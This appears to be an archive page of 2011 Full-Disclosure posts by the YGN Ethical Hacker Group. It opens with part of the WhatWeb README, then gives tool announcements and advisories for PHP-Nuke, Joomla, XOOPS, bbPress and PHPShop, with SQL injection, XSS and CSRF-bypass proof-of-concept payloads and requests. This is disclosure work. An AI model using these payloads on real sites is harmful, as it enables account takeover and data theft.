If you have any questions, comments or concerns regarding WhatWeb,
please consult the documentation
prior to contacting one of the developers. Your feedback is always welcome.


       Contents
       
       1.  About WhatWeb
       2.  Example Usage
       3.  Usage
       4.  Logging  Output
       5.  Plugins
       6.  Aggression
       7.  Recursive Spidering
       8.  Performance  Stability
       9.  Optional Dependencies
       10. Release History
       11. Credits
       12. Updates  Additional Information
       



1. About WhatWeb


WhatWeb identifies websites. It's goal is to answer the question,
What is that Website?. WhatWeb
recognises web technologies including content management systems
(CMS), blogging platforms,
statistic/analytics packages, JavaScript libraries, web servers, and
embedded devices. WhatWeb has
over 900 plugins, each to recognise something different. WhatWeb also
identifies version numbers,
email addresses, account ID's, web framework modules, SQL errors, and more.

WhatWeb can be stealthy and fast, or thorough but slow. WhatWeb
supports an aggression level to
control the trade off between speed and reliability. When you visit a
website in your browser, the
transaction includes many hints of what web technologies are powering
that website. Sometimes a
single webpage visit contains enough information to identify a website
but when it does not, WhatWeb
can interrogate the website further. The default level of aggression,
called 'passive', is the
fastest and requires only one HTTP request of a website. This is
suitable for scanning public
websites. More aggressive modes were developed for in penetration tests.

Most WhatWeb plugins are thorough and recognise a range of cues from
subtle to obvious. For example,
most WordPress websites can be identified by the meta HTML tag, e.g.
'meta name=generator
content=WordPress 2.6.5', but a minority of WordPress websites
remove this identifying tag but
this does not thwart WhatWeb. The WordPress WhatWeb plugin has over 15
tests, which include checking
the favicon, default installation files, login pages, and checking for
/wp-content/ within
relative links.


Features:
       * Over 900 plugins
       * Control the trade off between speed/stealth and reliability
       * Plugins include example URLs
       * Performance tuning. Control how many websites to scan concurrently.
       * Multiple log formats: Brief (greppable), Verbose (human
readable), XML, JSON, MagicTree,
RubyObject, MongoDB.
       * Recursive web spidering
       * Proxy support including TOR
       * Custom HTTP headers
       * Basic HTTP authentication
       * Control over webpage redirection
       * Nmap-style IP ranges
       * Fuzzy matching
       * Result certainty awareness
       * Custom plugins defined on the command line



2. Example Usage


Using WhatWeb on a handful of websites (standard WhatWeb output is in colour):

$ ./whatweb slashdot.org reddit.com
http://reddit.com [302] HTTPServer[AkamaiGHost],
RedirectLocation[http://www.reddit.com/],
Via-Proxy[1.1 bc1], IP[173.223.232.64], Akamai-Global-Host,
Country[UNITED STATES][US]
http://slashdot.org [200] Script, HTTPServer[Unix][Apache/1.3.42
(Unix) mod_perl/1.31],
Google-Analytics[GA][32013], Via-Proxy[1.1 bc5],
UncommonHeaders[x-fry,x-varnish,x-xrds-location,slash_log_data],
Apache[1.3.42][mod_perl/1.31],
HTML5, IP[216.34.181.45], 

[Full-disclosure] [Tool Update Announcement] inspathx

2011-03-23 Thread YGN Ethical Hacker Group
Tool Home:
http://code.google.com/p/inspathx/


CHANGELOG
=


Stat: path definitions - 342 , path vuln definitions - 140


== Added --xp as alias --x-p

== Refined param array that supports any number of dimensions with -p
option (i.e -p 1, -p 2, -p 3) - Thanks to Brendan Coles

http://code.google.com/p/inspathx/wiki/OPTION_Param_Array

== Added dotnet 1.x ASPX Full Path Disclosure (tilde character
/~.aspx) - Thanks to Ryan Dewhurst

http://code.google.com/p/inspathx/wiki/ASPNET_FULL_PATH_DISCLOSURE_DOTNET1X





-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] PHP-Nuke 8.x = chng_uid Blind SQL Injection Vulnerability

2011-03-23 Thread YGN Ethical Hacker Group
PHP-Nuke 8.x = Blind SQL Injection Vulnerability



1. OVERVIEW

The administration backend of PHP-Nuke 8.x is vulnerable to Blind SQL Injection.


2. BACKGROUND

PHP-Nuke is a Web Portal System or content management system. The goal
of PHP-Nuke is to have an automated web site to distribute news and
articles with users system. Each user can submit comments to discuss
the articles. Main features include: web based admin, surveys, top
page, access stats page with counter, user customizable box, themes
manager for registered users, friendly administration GUI with graphic
topic manager, option to edit or delete stories, option to delete
comments, moderation system, Referrers page to know who link us,
sections manager, customizable HTML blocks, user and authors edit, an
integrated Banners Ads system, search engine, backend/headlines
generation (RSS/RDF format), and many, many more friendly functions.


3. VULNERABILITY DESCRIPTION

The chng_uid parameter is not properly sanitized upon submission to
the /admin.php which leads to Blind SQL Injection vulnerability.
This allows an attacker to inject or manipulate SQL queries in the
back-end database, allowing for the manipulation or disclosure of
arbitrary data.


4. VERSIONS AFFECTED

8.0 and lower

Tested version: 8.0
The paid versions, 8.1 and 9.0, of php-Nuke may be vulnerable as well.


5. PROOF-OF-CONCEPT/EXPLOIT

= /admin.php

POST /admin.php HTTP/1.1
Referer: http://localhost/admin.php?op=mod_users
Content-Type: application/x-www-form-urlencoded
Host: localhost

chng_uid=[BLIND_SQL_INJECTION]+op=modifyUser


Tested Payloads:
' or 1=1-- [TRUE]
' or 1=2-- [FALSE]
' or substring(@@version,1,1)=5--  [TRUE if mySQL version is 5.x]
' or substring(@@version,1,1)=4--  [FALSE if mySQL version is 5.x]
' or SLEEP(15)=0-- [sleep for 15 seconds]

Successful response (True) returns the user update form page.


6. SOLUTION

Lock down access to php-Nuke administration backend.
No patch is available yet.
Use of this product is NOT recommended because of long lack of update
and vendor negligence about security reports.


7. VENDOR

php-Nuke Developers
http://phpnuke.org/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2011-01-01: contacted author through emails
2011-01-25: contacted author through web site contact form
2010-03-23: no replies from author
2010-03-23: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[phpnuke-8.x]_sql_injection
About PHP-Nuke: http://en.wikipedia.org/wiki/PHP-Nuke
PHP-Nuke 8.0: http://phpnuke.org/modules.php?name=Downloadsd_op=getitlid=658
CWE-89: http://cwe.mitre.org/data/definitions/89.html



#yehg [2010-03-23]

keywords: php nuke, php-nuke, phpnuke, 8.0, 8.1, blind, sqlin, sql injection

-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] PHP-Nuke 8.x = Cross Site Request Forgery (CSRF) / Anti-CSRF Bypass Vulnerability

2011-03-23 Thread YGN Ethical Hacker Group
PHP-Nuke 8.x  = Cross Site Request Forgery (CSRF) / Anti-CSRF Bypass
Vulnerability



1. OVERVIEW

The PHP-Nuke version 8.x and lower versions are vulnerable to Cross
Site Request Forgery (CSRF) because its Anti-CSRF mechanism (Referer
Check) is found to be broken.


2. BACKGROUND

PHP-Nuke is a Web Portal System or content management system. The goal
of PHP-Nuke is to have an automated web site to distribute news and
articles with users system. Each user can submit comments to discuss
the articles. Main features include: web based admin, surveys, top
page, access stats page with counter, user customizable box, themes
manager for registered users, friendly administration GUI with graphic
topic manager, option to edit or delete stories, option to delete
comments, moderation system, Referrers page to know who link us,
sections manager, customizable HTML blocks, user and authors edit, an
integrated Banners Ads system, search engine, backend/headlines
generation (RSS/RDF format), and many, many more friendly functions.


3. VULNERABILITY DESCRIPTION

The PHP-Nuke version 8.x and lower versions contain a flaw that allows
a remote Cross-site Request Forgery (CSRF / XSRF) attack. The flaw
exists because the application does not require multiple steps or
explicit confirmation for sensitive transactions for majority of
administrator functions such as adding new user, assigning user to
administrative privilege. By using a crafted URL, an attacker may
trick the victim into visiting to his web page to take advantage of
the trust relationship between the authenticated victim and the
application. Such an attack could trick the victim into executing
arbitrary commands in the context of their session with the
application, without further prompting or verification.


4. VERSIONS AFFECTED

8.0 and lower

Tested version: 8.0
The paid versions, 8.1 and 9.0, of PHP-Nuke may be vulnerable as well.


5. PROOF-OF-CONCEPT/EXPLOIT

Consider the following code snippet in /mainfile.php of PHP-Nuke:

//

109 if(!function_exists('stripos')) {
function stripos_clone($haystack, $needle, $offset=0) {
$return = strpos(strtoupper($haystack), 
strtoupper($needle), $offset);
if ($return === false) {
return false;
} else {
return true;
}
}
} else {
// But when this is PHP5, we use the original function
function stripos_clone($haystack, $needle, $offset=0) {
$return = stripos($haystack, $needle, 
$offset=0);
if ($return === false) {
return false;
} else {
return true;
}
}
128 }

..

206 // Posting from other servers in not allowed
207 // Fix by Quake
208 // Bug found by PeNdEjO

210 if ($_SERVER['REQUEST_METHOD'] == POST) {
if (isset($_SERVER['HTTP_REFERER'])) {
212 if (!stripos_clone($_SERVER['HTTP_REFERER'], 
$_SERVER['HTTP_HOST'])) {
die('Posting from another server not 
allowed!');
}
} else {
die($posttags);
}
}
//

It is clear that stripos_clone checks HTTP_REFERER value whether it
matches the target domain or not.
Attacker can easily bypass it by creating victim domain name under his
web root folder like:

http://attacker.in/victim.com/

From there, he could effectively perform CSRF attacks against php-Nuke users.

A short P0C demo video can be seen at
http://yehg.net/lab/pr0js/training/view/misc/PHPNuke_8x_Anti-CSRF-Bypass/


6. SOLUTION

Not Available.
Use of this product is NOT recommended because of long lack of update
and vendor negligence about security reports.


7. VENDOR

PHP-Nuke Developers
http://phpnuke.org/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2011-01-01: contacted author through emails
2011-01-25: contacted author through web site contact form
2010-03-23: no replies from author
2010-03-23: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[phpnuke-8.x]_cross_site_request_forgery
CSRF Wiki: 
https://secure.wikimedia.org/wikipedia/en/wiki/Cross-site_request_forgery
About PHP-Nuke: http://en.wikipedia.org/wiki/PHP-Nuke
PHP-Nuke

[Full-disclosure] PHP-Nuke 8.x = Cross Site Scripting Vulnerability

2011-03-23 Thread YGN Ethical Hacker Group
PHP-Nuke 8.x = Cross Site Scripting Vulnerability



1. OVERVIEW

The PHP-Nuke version 8.x and lower are vulnerable to Cross Site Scrtipting.


2. BACKGROUND

PHP-Nuke is a Web Portal System or content management system. The goal
of PHP-Nuke is to have an automated web site to distribute news and
articles with users system. Each user can submit comments to discuss
the articles. Main features include: web based admin, surveys, top
page, access stats page with counter, user customizable box, themes
manager for registered users, friendly administration GUI with graphic
topic manager, option to edit or delete stories, option to delete
comments, moderation system, Referrers page to know who link us,
sections manager, customizable HTML blocks, user and authors edit, an
integrated Banners Ads system, search engine, backend/headlines
generation (RSS/RDF format), and many, many more friendly functions.


3. VULNERABILITY DESCRIPTION

The sender_name and the sender_email parameter are not properly
sanitized upon submission to the /modules.php?name=Feedback, which
allows attacker to conduct Cross Site Scripting attack. This may allow
an attacker to create a specially crafted URL that would execute
arbitrary script code in a victim's browser.


4. VERSIONS AFFECTED

8.0 and lower

Tested version: 8.0
The paid versions, 8.1 and 9.0, of PHP-Nuke may be vulnerable as well.


5. PROOF-OF-CONCEPT/EXPLOIT

Parameter: sender_name

[REQUEST]
POST /phpnuke/modules.php?name=Feedback HTTP/1.1
Host: attacker.in
Referer: http://attacker.in/phpnuke/modules.php?name=Feedback

sender_name=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%2FXSS%2F%29%3Esender_email=message=opi=dssubmit=Send
[/REQUEST]

-
Parameter: sender_email

[REQUEST]
POST /phpnuke/modules.php?name=Feedback HTTP/1.1
Host: attacker.in
Referer: http://attacker.in/phpnuke/modules.php?name=Feedback

sender_email=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%2FXSS%2F%29%3Esender_name=message=opi=dssubmit=Send
[/REQUEST]


6. SOLUTION

Not Available.
Use of this product is NOT recommended because of long lack of update
and vendor negligence about security reports.


7. VENDOR

PHP-Nuke Developers
http://phpnuke.org/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2011-01-01: contacted author through emails
2011-01-25: contacted author through web site contact form
2010-03-23: no replies from author
2010-03-23: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[phpnuke-8.x]_cross_site_scripting
About PHP-Nuke: http://en.wikipedia.org/wiki/PHP-Nuke
php-Nuke 8.0: http://phpnuke.org/modules.php?name=Downloadsd_op=getitlid=658
CWE-79: http://cwe.mitre.org/data/definitions/79.html



#yehg [2010-03-23]

keywords: php nuke, php-nuke, phpnuke, 8.0, 8.1,  xss

-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Joomla! 1.6.0 | Information Disclosure/Full Path Disclosure Vulnerability

2011-03-22 Thread YGN Ethical Hacker Group
Joomla! 1.6.0 | Information Disclosure/Full Path Disclosure Vulnerability


1. OVERVIEW

Joomla! 1.6.0 is vulnerable to Full Path Disclosure.


2. BACKGROUND

Joomla is a free and open source content management system (CMS) for
publishing content on the World Wide Web and intranets. It comprises a
model–view–controller (MVC) Web application framework that can also be
used independently.
Joomla is written in PHP, uses object-oriented programming (OOP)
techniques and software design patterns, stores data in a MySQL
database, and includes features such as page caching, RSS feeds,
printable versions of pages, news flashes, blogs, polls, search, and
support for language internationalization.


3. VULNERABILITY DESCRIPTION

Direct access to a library file was not protected, which causes
revealing the full internal path of a server whose PHP setting is set
to show errors.


4. VERSION AFFECTED

Joomla! 1.6.0


5. PROOF-OF-CONCEPT/EXPLOIT

http://attacker.in/joomla160/libraries/phpmailer/language/phpmailer.lang-joomla.php


6. SOLUTION

Upgrade to Joomla! 1.6.1 or higher


7. VENDOR

Joomla! Developer Team
http://www.joomla.org


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2011-01-24: notified vendor
2011-03-08: vendor released fix
2011-03-23: vulnerability disclosed


10. REFERENCES

Vendor Advisory URL:
http://developer.joomla.org/security/news/328-20110201-core-sql-injection-path-disclosure.html
Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.6.0]_full_path_disclosure
inspathx signature:
http://code.google.com/p/inspathx/source/browse/trunk/paths_vuln/joomla-1.6.0
WASC-13: http://projects.webappsec.org/w/page/13246936/Information-Leakage
CWE-200: http://cwe.mitre.org/data/definitions/200.html


#yehg [2011-03-23]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] XOOPS 2.5.0 = Cross Site Scripting Vulnerability

2011-03-18 Thread YGN Ethical Hacker Group
XOOPS 2.5.0 = Cross Site Scripting Vulnerability



1. OVERVIEW

The XOOPS 2.5.0 and lower versions were vulnerable to Cross Site Scripting.


2. BACKGROUND

XOOPS is an acronym of eXtensible Object Oriented Portal System. It's
the #1 Content Management System (CMS) project on www.sourceforge.net
and a recipient of several awards, and constantly places as finalist
in various CMS and Open Source competitions. It incorporates many
modules such as forums, photo galleries, calendars, article management
etc.


3. VULNERABILITY DESCRIPTION

Several parameters such as module/module[], memberslist_id[],
newname[], oldname[] were not properly sanitized upon submission to
the /modules/system/admin.php url, which allows attacker to conduct
Cross Site Scripting attack. This may allow an attacker to create a
specially crafted URL that would execute arbitrary script code in a
victim's browser.


4. VERSIONS AFFECTED

XOOPS 2.5.0 and lower


5. PROOF-OF-CONCEPT/EXPLOIT


Parameter: module

http://attacker.in/xoops/modules/system/admin.php?fct=modulesadminop=installmodule=pm%3Cimg%20src=a%20onerror=alert%28String.fromCharCode%2888,83,83%29%29%3Eaawe


Parameter: module[]

[REQUEST]
POST /xoops/modules/system/admin.php HTTP/1.1
Host: attacker.in
Connection: close
Referer: http://attacker.in/xoops/modules/system/admin.php?fct=modulesadmin
Cookie: PHPSESSID=b11e32946cf66e9a6391ccbad34453af;
xoops_user=1-549115432fcb56150b18bef08004f77d;
Content-Type: application/x-www-form-urlencoded
Content-Length: 100

op=confirmmodule%5b%5d=1scriptalert(1)/scriptsubmit=Submitoldname%5b1%5d=Systemfct=modulesadminnewname%5b1%5d=System
[/REQUEST]


Parameter: memberslist_id[]

[REQUEST]
POST /xoops/modules/system/admin.php HTTP/1.1
Host: attacker.in
Connection: close
Referer: http://attacker.in/xoops/modules/system/admin.php?fct=usersselgroups=2
Cookie: PHPSESSID=b11e32946cf66e9a6391ccbad34453af;
xoops_user=1-549115432fcb56150b18bef08004f77d;
Content-Type: application/x-www-form-urlencoded
Content-Length: 94

memberslist_id%5b%5d=scriptalert(1)/scriptop=action_groupSubmit=selgroups=1fct=mailusersedit_group=add_group
[/REQUEST]


Parameter: newname[]

[REQUEST]
POST /xoops/modules/system/admin.php HTTP/1.1
Host: attacker.in
Connection: close
Referer: http://attacker.in/xoops/modules/system/admin.php?fct=modulesadmin
Cookie: PHPSESSID=b11e32946cf66e9a6391ccbad34453af;
xoops_user=1-549115432fcb56150b18bef08004f77d;
Content-Type: application/x-www-form-urlencoded
Content-Length: 100

op=confirmmodule%5b%5d=1submit=Submitoldname%5b1%5d=Systemfct=modulesadminnewname%5b1%5d=Systemscriptalert(1)/script
[/REQUEST]


Parameter: oldname[]

[REQUEST]
POST /xoops/modules/system/admin.php HTTP/1.1
Host: attacker.in
Connection: close
Referer: http://attacker.in/xoops/modules/system/admin.php?fct=modulesadmin
Cookie: PHPSESSID=b11e32946cf66e9a6391ccbad34453af;
xoops_user=1-549115432fcb56150b18bef08004f77d;
Content-Type: application/x-www-form-urlencoded
Content-Length: 100

op=confirmmodule%5b%5d=1submit=Submitoldname%5b1%5d=Systemscriptalert(1)/script1bf8581e3dcfct=modulesadminnewname%5b1%5d=System
[/REQUEST]


6. SOLUTION

Upgrade to XOOPS 2.5.1 or higher


7. VENDOR

XOOPS Development Team
http://xoops.org


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2011-03-10: notified vendor
2011-03-16: vendor released fixed version
2011-03-18: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[xoops_2.5.0]_cross_site_scripting
Vendor Announcement: http://xoops.org/modules/news/article.php?storyid=5851
What XSS Can Do: http://yehg.net/lab/pr0js/view.php/What%20XSS%20Can%20Do.pdf
XSS FAQs: http://www.cgisecurity.com/articles/xss-faq.shtml
XSS (wiki): http://en.wikipedia.org/wiki/Cross-site_scripting
XSS (owasp): http://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
OWASP Top 10: http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
CWE-79: http://cwe.mitre.org/data/definitions/79.html


#yehg [2011-03-18]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] bbPress 1.0.2 = Cross Site Scripting Vulnerability

2011-03-13 Thread YGN Ethical Hacker Group
=
bbPress 1.0.2 = Cross Site Scripting Vulnerability
=



1. OVERVIEW

bbPress 1.0.2 and lower versions were vulnerable to Cross Site Scripting.


2. APPLICATION DESCRIPTION

bbPress is plain and simple forum software, plain and simple with a
twist from the creators of WordPress.
It is focused on web standards, ease of use, ease of integration, and speed.


3. VULNERABILITY DESCRIPTION

The Query String was not properly sanitized upon submission to the
/index.php url, which allows attacker to conduct Cross Site Scripting
attack.
This may allow an attacker to create a specially crafted URL that
would execute arbitrary script code in a victim's browser.
If a user has already logged in to the application, an XSS attack will
execute promptly.
If not, it will execute after the user's successful logging in.


4. VERSIONS AFFECTED

bbPress 1.0.2 and lower


5. PROOF-OF-CONCEPT/EXPLOIT

http://localhost/bb-login.php?re=data%3Atext%2Fhtml%3Bbase64%2CPHNjcmlwdD5hbGVydCgiWFNTXG4iK2RvY3VtZW50LmNvb2tpZSk8L3NjcmlwdD4%3D


6. SOLUTION

Upgrade to 1.0.3 or higher


7. VENDOR

bbPress Development Team
http://bbpress.org/


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2010-12-23: notified vendor
2011-02-24: vendor released fixed version
2011-03-13: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[bbpress-1.0.2]_cross_site_scripting
About bbPress: http://bbpress.org/about/


#yehg [2011-03-13]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [new tool announcement] host-extract

2011-03-13 Thread YGN Ethical Hacker Group
Host-Extract | Host/IP Pattern Extractor
===

category: /pentest/enumeration/www
useful area: blackbox testing


This little ruby script tries to extract all IP/Host patterns in page
response of a given URL and JavaScript/CSS files of that URL.

With it, you can quickly identify internal IPs/Hostnames, development
IPs/ports, cdn, load balancers, additional attack entries related to
your target that are revealed in inline js, css, html comment areas
and js/css files.

This is unlike web crawler which looks for new links only in anchor
tags (a) or the like.

In some cases, host-extract may give you false positives when there
are some words like - main-site_ver_10.2.1.3.swf.

With -v option, you can ask the tool to output html view-source
snippets for each IP/Domain extracted. This will shorten your manual
analysis time.

Please go to http://host-extract.googlecode.com/ for more info.


Download/Update
==
svn co http://host-extract.googlecode.com/svn/trunk/ host-extract


Tutorial Wiki
==

Sebastien Damaye from aldeid.com has prepared a thorough host-extract
tutorial with real-world famous web sites.

http://aldeid.com/index.php/Host-extract


Bugs/Suggestions Report
===

Please report bugs/suggestions to host-extract at yehg.net.
Thanks for your contribution.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Joomla! 1.6.0 | Cross Site Scripting (XSS) Vulnerability

2011-03-13 Thread YGN Ethical Hacker Group
==
 Joomla! 1.6.0 | Cross Site Scripting (XSS) Vulnerability
==


1. OVERVIEW

Joomla! 1.6.0 was vulnerable to Cross Site Scripting.


2. PRODUCT DESCRIPTION

Joomla is a free and open source content management system (CMS) for
publishing content on the World Wide Web and intranets. It comprises a
model–view–controller (MVC) Web application framework that can also be
used independently.
Joomla is written in PHP, uses object-oriented programming (OOP)
techniques and software design patterns, stores data in a MySQL
database, and includes features such as page caching, RSS feeds,
printable versions of pages, news flashes, blogs, polls, search, and
support for language internationalization.


3. VULNERABILITY DESCRIPTION

The Query String parameter was not properly sanitized upon submission
to the /index.php url, which allows attacker to conduct Cross Site
Scripting attack. This may allow an attacker to create a specially
crafted URL that would execute arbitrary script code in a victim's
browser.


4. VERSION AFFECTED

Joomla! 1.6.0


5. PROOF-OF-CONCEPT/EXPLOIT

 SEO-enabled Joomla 1.6.0

http://attacker.in/joomla160/index.php/%2522%253E%253Cimg%2520src%253Da%2520onerror%253Dalert(String.fromCharCode(88,83,83))%253E09739572178%252F

http://attacker.in/joomla160/index.php/using-joomla/extensions/components/search-component/search/'%2522%253E%253Cscript%253Ealert(%252FXSS%252F)%253C%252Fscript%253E

http://attacker.in/joomla160/index.php/contact-us/'%2522%253E%253Cscript%253Ealert(%252FXSS%252F)%253C%252Fscript%253E

http://attacker.in/joomla160/index.php/park-links?'%2522%253E%253Cscript%253Ealert(%252FXSS%252F)%253C%252Fscript%253E=1

http://attacker.in/joomla160/index.php/using-joomla/extensions/templates?'%2522%253E%253Cscript%253Ealert(%252FXSS%252F)%253C%252Fscript%253E=1


 SEO-disabled Joomla 1.6.0

http://attacker.in/joomla160x/index.php?option=com_weblinksview=categoryid=18Itemid=227a86a9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9666d64388c=1

http://attacker.in/joomla160x/index.php?option=com_contentview=categorylayout=blogid=21Itemid=268%2522%253e%253cscript%253ealert%280%29%253c/script%253e=XSS


This is the exactly same variant as shown in our last year demo video
in 1.5.20:

http://yehg.net/lab/pr0js/training/view/misc/joomla-1.5.20_encoded-xss/

We thought Joomla! team would fix this issue in 1.6.0 stable release
whilst they fixed it in Joomla! 1.5.21!


6. IMPACT

Attackers can compromise currently logged-in user/administrator
session and impersonate arbitrary user actions available under
/administrator/ functions.


7. SOLUTION

Upgrade to Joomla! 1.6.1 or higher


8. VENDOR

Joomla! Developer Team
http://www.joomla.org


9. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


10. DISCLOSURE TIME-LINE

2011-01-24: notified vendor
2011-03-08: vendor released fix
2011-03-14: vulnerability disclosed


11. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.6.0]_cross_site_scripting(XSS)
Former Advisory URL:
http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.5.20]_cross_site_scripting(XSS)
XSS FAQ: http://www.cgisecurity.com/xss-faq.html
OWASP Top 10: http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
CWE-79: http://cwe.mitre.org/data/definitions/79.html


#yehg [2011-03-14]




-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Joomla! 1.6.0 | SQL Injection Vulnerability

2011-03-13 Thread YGN Ethical Hacker Group
=
 Joomla! 1.6.0 | SQL Injection Vulnerability
=


1. OVERVIEW

Joomla! 1.6.0 was vulnerable to SQL Injection.


2. BACKGROUND

Joomla is a free and open source content management system (CMS) for
publishing content on the World Wide Web and intranets. It comprises a
model–view–controller (MVC) Web application framework that can also be
used independently.
Joomla is written in PHP, uses object-oriented programming (OOP)
techniques and software design patterns, stores data in a MySQL
database, and includes features such as page caching, RSS feeds,
printable versions of pages, news flashes, blogs, polls, search, and
support for language internationalization.


3. VULNERABILITY DESCRIPTION

Parameters (filter_order, filer_order_Dir) were not properly sanitized
in Joomla! that lead to SQL Injection vulnerability.  This could an
attacker to inject or manipulate SQL queries in the back-end database,
allowing for the manipulation or disclosure of arbitrary data.


4. VERSION AFFECTED

Joomla! 1.6.0


5. PROOF-OF-CONCEPT/EXPLOIT

http://attacker.in/joomla160/index.php/using-joomla/extensions/components/content-component/article-category-list/?filter_order=yehg.net.aAAA,filter_order_Dir=2limit=3limitstart=4


http://attacker.in/joomla160/index.php/using-joomla/extensions/components/content-component/article-category-list/?filter_order=1,filter_order_Dir=yehg.net.,limit=3limitstart=4


This is the exact same variant as shown in Joomla! 1.5.21:
http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.5_21]_sql_injection

We thought Joomla! team would fix this issue in 1.6.0 stable release
whilst they fixed it in Joomla! 1.5.22!


6. SOLUTION

Upgrade to Joomla! 1.6.1 or higher


7. VENDOR

Joomla! Developer Team
http://www.joomla.org


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2011-01-24: notified vendor
2011-03-08: vendor released fix
2011-03-14: vulnerability disclosed


10. REFERENCES

Vendor Advisory URL:
http://developer.joomla.org/security/news/328-20110201-core-sql-injection-path-disclosure.html
Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.6.0]_sql_injection
OWASP Top 10: http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
CWE-89: http://cwe.mitre.org/data/definitions/89.html


#yehg [2011-03-14]



-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] PHPShop 0.8.1 = | Cross Site Scripting Vulnerability

2011-02-24 Thread YGN Ethical Hacker Group

PHPShop 0.8.1 = | Cross Site Scripting Vulnerability



1. OVERVIEW

The PHPShop 0.8.1 and lower versions are currently vulnerable to Cross
Site Scripting.


2. BACKGROUND

PHPShop is a PHP-powered shopping cart application. It is released
under the GNU General Public License.
The primary purpose of PHPShop is to provide a simple shopping cart
solution that is easy to customize to suit any purpose. PHPShop has
less features that many other shopping cart applications, but is
generally easier to customize.


3. VULNERABILITY DESCRIPTION

The Query String was not properly sanitized upon submission to the
/index.php url, which allows attacker to conduct Cross Site Scripting
attack.
This may allow an attacker to create a specially crafted URL that
would execute arbitrary script code in a victim's browser.


4. VERSIONS AFFECTED

PHP 0.8.1 =


5. PROOF-OF-CONCEPT/EXPLOIT

http://localhost/phpshop0_8_1/?page=store/XSS%26%26%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E%3d1


6. SOLUTION

The vendor has discontinued this product.
It is recommended that an alternate software package be used in its place.


7. VENDOR

PHPShop Development Team
http://phpshop.org


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2011-02-25: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[phpshop_0.8.1]_cross_site_scripting
Project Home: http://code.google.com/p/phpshop/,
http://sourceforge.net/projects/phpshop/
PHPShop Download Stats:
http://sourceforge.net/projects/phpshop/files/phpshop/0.8.1/stats/timeline?dates=2010-01-01+to+2010-01-01
XSS (owasp): http://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
CWE-79: http://cwe.mitre.org/data/definitions/79.html


#yehg [2011-02-25]

-
